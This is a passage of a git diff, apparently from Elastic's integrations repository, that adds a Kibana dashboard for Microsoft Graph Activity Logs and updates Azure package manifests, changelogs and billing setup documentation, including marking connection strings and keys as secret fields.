"hidePanelTitles": false + }, + "gridData": { + "h": 6, + "i": "8edfaa9c-8f05-4059-862f-a105de3304d6", + "w": 8, + "x": 40, + "y": 6 + }, + "panelIndex": "8edfaa9c-8f05-4059-862f-a105de3304d6", + "title": "Total HTTP Requests (copy 5)", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2ac1988b-9f69-439c-8898-0a385bb56434": { + "columnOrder": [ + "bb6d8913-2437-461c-a5cb-95f745f2e061", + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "columns": { + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "bb6d8913-2437-461c-a5cb-95f745f2e061": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Cloud Region", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "37aa3be8-a77c-4241-92a7-4d1b58bc0d47", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "cloud.region" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "2ac1988b-9f69-439c-8898-0a385bb56434", + "layerType": "data", + "legendDisplay": "show", + "legendSize": "auto", + "metrics": [ + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "bb6d8913-2437-461c-a5cb-95f745f2e061" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 12, + "i": "1d970b9f-148c-40e7-9723-76ae8d6de9ef", + "w": 17, + "x": 0, + "y": 12 + }, + "panelIndex": "1d970b9f-148c-40e7-9723-76ae8d6de9ef", + "title": "% of Graph Activity by Cloud Region", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2ac1988b-9f69-439c-8898-0a385bb56434": { + "columnOrder": [ + "bb6d8913-2437-461c-a5cb-95f745f2e061", + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "columns": { + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Requests", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "bb6d8913-2437-461c-a5cb-95f745f2e061": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Cloud Region", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "37aa3be8-a77c-4241-92a7-4d1b58bc0d47", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "cloud.region" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "layerId": "2ac1988b-9f69-439c-8898-0a385bb56434", + "layerType": "data", + "seriesType": "bar_horizontal", + "xAccessor": "bb6d8913-2437-461c-a5cb-95f745f2e061" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 12, + "i": "23c1cc59-ff4c-48ef-bfc7-ee8a705a45f3", + "w": 31, + "x": 17, + "y": 12 + }, + "panelIndex": "23c1cc59-ff4c-48ef-bfc7-ee8a705a45f3", + "title": "Graph Activity by Cloud Region", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "2ac1988b-9f69-439c-8898-0a385bb56434": { + "columnOrder": [ + "bb6d8913-2437-461c-a5cb-95f745f2e061", + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "columns": { + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "bb6d8913-2437-461c-a5cb-95f745f2e061": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "User ID", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "37aa3be8-a77c-4241-92a7-4d1b58bc0d47", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "user.id" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*" + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "2ac1988b-9f69-439c-8898-0a385bb56434", + "layerType": "data", + "legendDisplay": "show", + "legendSize": "auto", + "metrics": [ + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "bb6d8913-2437-461c-a5cb-95f745f2e061" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 12, + "i": "ecb78f06-c2e8-4da8-9c05-091ae47cabab", + "w": 17, + "x": 0, + "y": 24 + }, + "panelIndex": "ecb78f06-c2e8-4da8-9c05-091ae47cabab", + "title": "% of Graph Activity by User", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2ac1988b-9f69-439c-8898-0a385bb56434": { + "columnOrder": [ + "df2b5869-05ef-48e4-8113-b369950b832e", + "bb6d8913-2437-461c-a5cb-95f745f2e061", + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "columns": { + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Requests", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "bb6d8913-2437-461c-a5cb-95f745f2e061": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "df2b5869-05ef-48e4-8113-b369950b832e": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of user.id", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "37aa3be8-a77c-4241-92a7-4d1b58bc0d47", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "user.id" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "layerId": "2ac1988b-9f69-439c-8898-0a385bb56434", + "layerType": "data", + "seriesType": "line", + "splitAccessor": "df2b5869-05ef-48e4-8113-b369950b832e", + "xAccessor": "bb6d8913-2437-461c-a5cb-95f745f2e061" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 12, + "i": "6fce6c97-be76-41b5-b4eb-2e67b2dd060b", + "w": 31, + "x": 17, + "y": 24 + }, + "panelIndex": "6fce6c97-be76-41b5-b4eb-2e67b2dd060b", + "title": "Graph Activity by User Timeline", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "2ac1988b-9f69-439c-8898-0a385bb56434": { + "columnOrder": [ + "bb6d8913-2437-461c-a5cb-95f745f2e061", + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "columns": { + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "bb6d8913-2437-461c-a5cb-95f745f2e061": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "User ID", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "37aa3be8-a77c-4241-92a7-4d1b58bc0d47", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "http.request.method" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*" + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "2ac1988b-9f69-439c-8898-0a385bb56434", + "layerType": "data", + "legendDisplay": "show", + "legendSize": "auto", + "metrics": [ + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "bb6d8913-2437-461c-a5cb-95f745f2e061" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 12, + "i": "32635ea5-aef9-490a-9851-252f66a4180d", + "w": 17, + "x": 0, + "y": 36 + }, + "panelIndex": "32635ea5-aef9-490a-9851-252f66a4180d", + "title": "% of Graph Activity by HTTP Method", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2ac1988b-9f69-439c-8898-0a385bb56434": { + "columnOrder": [ + "bb6d8913-2437-461c-a5cb-95f745f2e061", + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "columns": { + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Requests", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "bb6d8913-2437-461c-a5cb-95f745f2e061": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "HTTP Method", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "37aa3be8-a77c-4241-92a7-4d1b58bc0d47", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "http.request.method" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "layerId": "2ac1988b-9f69-439c-8898-0a385bb56434", + "layerType": "data", + "seriesType": "bar", + "xAccessor": "bb6d8913-2437-461c-a5cb-95f745f2e061" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 12, + "i": "12619b1e-73a1-474b-89eb-8ee01df017de", + "w": 15, + "x": 17, + "y": 36 + }, + "panelIndex": "12619b1e-73a1-474b-89eb-8ee01df017de", + "title": "Graph Activity by HTTP Method", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2ac1988b-9f69-439c-8898-0a385bb56434": { + "columnOrder": [ + "bb6d8913-2437-461c-a5cb-95f745f2e061", + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + ], + "columns": { + "37aa3be8-a77c-4241-92a7-4d1b58bc0d47": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Requests", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "bb6d8913-2437-461c-a5cb-95f745f2e061": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "HTTP Method", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "37aa3be8-a77c-4241-92a7-4d1b58bc0d47", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "http.request.method" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "columns": [ + { + "columnId": "bb6d8913-2437-461c-a5cb-95f745f2e061" + }, + { + "columnId": "37aa3be8-a77c-4241-92a7-4d1b58bc0d47" + } + ], + "layerId": "2ac1988b-9f69-439c-8898-0a385bb56434", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 12, + "i": "3b43fe5b-e12b-408e-bc24-72dabfcfbc78", + "w": 16, + "x": 32, + "y": 36 + }, + "panelIndex": "3b43fe5b-e12b-408e-bc24-72dabfcfbc78", + "title": "Graph Activity by HTTP Method - Table", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Logs Azure] Microsoft Graph Activity Logs", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-08T13:50:59.523Z", + "id": "azure-2b2e94c8-aff5-401d-b9a5-aae2d051a92c", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0d7a9e98-05e4-48cc-b602-fbf6441fb5eb:indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2d47eead-9f8b-4540-8e61-45290eda210a:indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e0d5b2a4-14b1-4652-81f5-8989c48cb427:indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e0d5b2a4-14b1-4652-81f5-8989c48cb427:f873ce81-d2b9-4d27-951b-ea42fe7b6629", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "faac9860-e512-4adf-a34a-0a89690fef99:indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "faac9860-e512-4adf-a34a-0a89690fef99:64260958-62e3-45e9-accd-9a2f49bc86a2", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f81b2567-5721-4dca-9ebf-243a69b06fe2:indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f81b2567-5721-4dca-9ebf-243a69b06fe2:7cde628c-4f1d-44e1-8a34-169e4bb5e0b7", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8edfaa9c-8f05-4059-862f-a105de3304d6:indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8edfaa9c-8f05-4059-862f-a105de3304d6:3027aa07-12ed-48a1-a760-745ed4a9ea26", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1d970b9f-148c-40e7-9723-76ae8d6de9ef:indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "23c1cc59-ff4c-48ef-bfc7-ee8a705a45f3:indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ecb78f06-c2e8-4da8-9c05-091ae47cabab:indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6fce6c97-be76-41b5-b4eb-2e67b2dd060b:indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "32635ea5-aef9-490a-9851-252f66a4180d:indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "12619b1e-73a1-474b-89eb-8ee01df017de:indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3b43fe5b-e12b-408e-bc24-72dabfcfbc78:indexpattern-datasource-layer-2ac1988b-9f69-439c-8898-0a385bb56434", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_d1ebc51c-cb49-49f6-840a-2da6d8a6be5b:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_d8d6db3e-83cb-40af-8f04-34f83ee80c6e:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_411c7a87-3506-4e60-949e-4d3694f18141:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_ba723455-7325-4205-95f4-6e52fa4e6e46:rangeSliderDataView", + "type": "index-pattern" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/azure/manifest.yml b/packages/azure/manifest.yml index 21257e4157c..057a513cc6a 100644 --- a/packages/azure/manifest.yml +++ b/packages/azure/manifest.yml @@ -1,6 +1,6 @@ name: azure title: Azure Logs -version: 1.8.3 +version: 1.11.0 description: This Elastic integration collects logs from Azure type: integration icons: @@ -8,13 +8,13 @@ icons: title: logo azure size: 32x32 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.2" categories: - azure - observability conditions: kibana: - version: "^8.8.0" + version: "^8.12.0" elastic: subscription: basic screenshots: @@ -39,7 +39,8 @@ vars: show_user: true default: $Default - name: connection_string - type: text + type: password + secret: true title: Connection String multi: false required: true @@ -55,7 +56,8 @@ vars: description: >- The name of the storage account where the consumer group's state/offsets will be stored and updated. - name: storage_account_key - type: text + type: password + secret: true title: Storage Account Key multi: false required: true @@ -156,6 +158,28 @@ policy_templates: title: filebeat azure overview size: 5002x2666 type: image/png + - name: graphactivitylogs + title: Microsoft Graph Activity Logs + description: Microsoft Graph Activity Logs integration + data_streams: + - graphactivitylogs + categories: + - security + inputs: + - type: "azure-eventhub" + title: "Collect Microsoft Graph Activity Logs from Event Hub" + description: "Collecting graph activity logs from Azure instances (input: azure-eventhub)" + input_group: logs + icons: + - src: /img/graph_activity.png + title: logo graphactivity + size: 32x32 + type: image/svg+xml + screenshots: + - src: /img/graph_activity_logs.png + title: microsoft graph activity overview + size: 5002x2666 + type: image/png - name: springcloudlogs title: Azure Spring Apps logs description: Azure Spring Apps logs integration diff --git a/packages/azure_app_service/changelog.yml b/packages/azure_app_service/changelog.yml index 4fb494ac21e..2b76dedefc8 100644 --- a/packages/azure_app_service/changelog.yml +++ b/packages/azure_app_service/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: 0.3.0 + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: 0.2.1 + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: 0.2.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: 0.1.0 changes: - description: Update the package format_version to 3.0.0. diff --git a/packages/azure_app_service/manifest.yml b/packages/azure_app_service/manifest.yml index b8d9735e0de..1f49215a2c1 100644 --- a/packages/azure_app_service/manifest.yml +++ b/packages/azure_app_service/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: azure_app_service title: "Azure App Service" -version: "0.1.0" +version: "0.3.0" source: license: "Elastic-2.0" description: "Collect logs and metrics from Azure App Service with Elastic Agent." @@ -11,7 +11,7 @@ categories: - cloud conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" elastic: subscription: "basic" vars: @@ -31,8 +31,9 @@ vars: show_user: true default: $Default - name: connection_string - type: text + type: password title: Connection String + secret: true multi: false required: true show_user: true @@ -47,8 +48,9 @@ vars: description: >- The name of the storage account where the consumer group's state/offsets will be stored and updated. - name: storage_account_key - type: text + type: password title: Storage Account Key + secret: true multi: false required: true show_user: true diff --git a/packages/azure_application_insights/changelog.yml b/packages/azure_application_insights/changelog.yml index a81ce6aec0d..f32b8405c59 100644 --- a/packages/azure_application_insights/changelog.yml +++ b/packages/azure_application_insights/changelog.yml @@ -1,3 +1,8 @@ +- version: "1.4.0" + changes: + - description: Enable 'secret' for the sensitive fields. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "1.3.0" changes: - description: Enable time series data for metrics data streams. This dramatically reduces storage for metrics and is expected to progressively improve query [performance](https://www.elastic.co/blog/70-percent-storage-savings-for-metrics-with-elastic-observability). For more details, see https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds.html. diff --git a/packages/azure_application_insights/manifest.yml b/packages/azure_application_insights/manifest.yml index e1c1b8b0187..f30a03571e6 100644 --- a/packages/azure_application_insights/manifest.yml +++ b/packages/azure_application_insights/manifest.yml @@ -1,6 +1,6 @@ name: azure_application_insights title: Azure Application Insights Metrics Overview -version: 1.3.0 +version: 1.4.0 description: Collect application insights metrics from Azure Monitor with Elastic Agent. type: integration icons: @@ -13,7 +13,7 @@ screenshots: title: App State Overview size: 5120x2562 type: image/png -format_version: "3.0.0" +format_version: "3.0.2" categories: - azure - observability @@ -30,8 +30,9 @@ vars: required: true show_user: true - name: api_key - type: text + type: password title: Api Key + secret: true multi: false required: true show_user: true diff --git a/packages/azure_billing/_dev/build/docs/README.md b/packages/azure_billing/_dev/build/docs/README.md index 7311076a74f..462c443b324 100644 --- a/packages/azure_billing/_dev/build/docs/README.md +++ b/packages/azure_billing/_dev/build/docs/README.md @@ -19,7 +19,7 @@ Usage details metrics track actual expenses including details like subscription To use this integration you will need: -* **Azure App Registration**: You need to set up an Azure App Registration to allow the Agent to access the Azure APIs. The App Registration requires the Billing Reader role to access the billing information for the subscription, department, or billing account. See more details in the [Setup section](#setup). +* **Azure App Registration**: You need to set up an Azure App Registration to allow the Agent to access the Azure APIs. The App Registration requires a role to access the billing information. The required role is different depending on the subscription, department, or billing account scope. Check the [Setup section](#setup) for more details. * **Elasticsearch and Kibana**: You need Elasticsearch to store and search your data and Kibana to visualize and manage it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, the [Native Azure Integration](https://azuremarketplace.microsoft.com/en-us/marketplace/apps/elastic.elasticsearch?tab=Overview), or self-manage the Elastic Stack on your hardware. * **Payment method**: Azure Billing Metrics integration queries are charged based on the number of standard API calls. One integration makes two calls every 24 hours in the standard configuration. @@ -79,6 +79,10 @@ Take note of the content in the **Value** column in the **Client secrets** table #### Assign role +Assign a role to the App Registration depending on the scope you're interested in. + +To collect billing metrics from a single subscription, assign the **Billing Reader** to the App Registration on that subscription: + 1. In the [Azure Portal](https://portal.azure.com/), search for and select **Subscriptions**. 1. Select the subscription to assign the application. 1. Select **Access control (IAM)**. @@ -90,10 +94,34 @@ Take note of the content in the **Value** column in the **Client secrets** table 1. Click the **Select** button. 1. Then click the **Review + assign** button. +You can use the department scope (EA accounts only) or the billing account scope (EA and MCA accounts) to collect billing metrics from multiple subscriptions. + +To collect billing metrics from a department (instead of a subscription): + +1. In the [Azure Portal](https://portal.azure.com/), search for and select **Cost Management + Billing**. +1. Select **Billing** > **Departments** and select the department you're interested in. +1. Select **Access control (IAM)**. +1. Select **Add**. +1. In the **Add role assignment** panel, select the role **Department reader**. +1. In the **Users, groups, or apps** search box, type the name of the App Registration you created and select it. +1. Click on the **Add** button. + +To collect billing metrics from a billing account (instead of a subscription): + +1. In the [Azure Portal](https://portal.azure.com/), search for and select **Cost Management + Billing**. +1. Select **Access control (IAM)**. +1. Select **Add**. +1. In the **Add role assignment** panel, select the role **Billing account reader** (view-only access). +1. In the **Users, groups, or apps** search box, type the name of the App Registration you created and select it. +1. Click on the **Add** button. + Take note of the following values, which you will use later when specifying settings. -* `Subscription ID`: use the content of the "Subscription ID" you selected. -* `Tenant ID`: use the "Tenant ID" from the Azure Active Directory you use. +* `Tenant ID`: use the "Tenant ID" from your Microsoft Entra ID. +* Only one of the following: + * `Subscription ID`: use the "Subscription Id" content if you decide to collect metrics from a subscription. + * `Department Id`: use the "Department Id" content if you decide to collect metrics from a department. + * `Billing account ID`: use the "Billing account ID" content if you decide to collect metrics from a billing account. Your App Registration is now ready for the Elastic Agent. diff --git a/packages/azure_billing/changelog.yml b/packages/azure_billing/changelog.yml index bce5c4f018f..ad93c772206 100644 --- a/packages/azure_billing/changelog.yml +++ b/packages/azure_billing/changelog.yml @@ -1,3 +1,23 @@ +- version: 1.5.0 + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: 1.4.2 + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: 1.4.1 + changes: + - description: Add documentation for assigning roles for department and billing account scopes. + type: enhancement + link: https://github.com/elastic/integrations/pull/9105 +- version: 1.4.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: 1.3.2 changes: - description: Fix missing reference for filter in dashboard. diff --git a/packages/azure_billing/docs/README.md b/packages/azure_billing/docs/README.md index 2788893ce36..222fc0b84e7 100644 --- a/packages/azure_billing/docs/README.md +++ b/packages/azure_billing/docs/README.md @@ -19,7 +19,7 @@ Usage details metrics track actual expenses 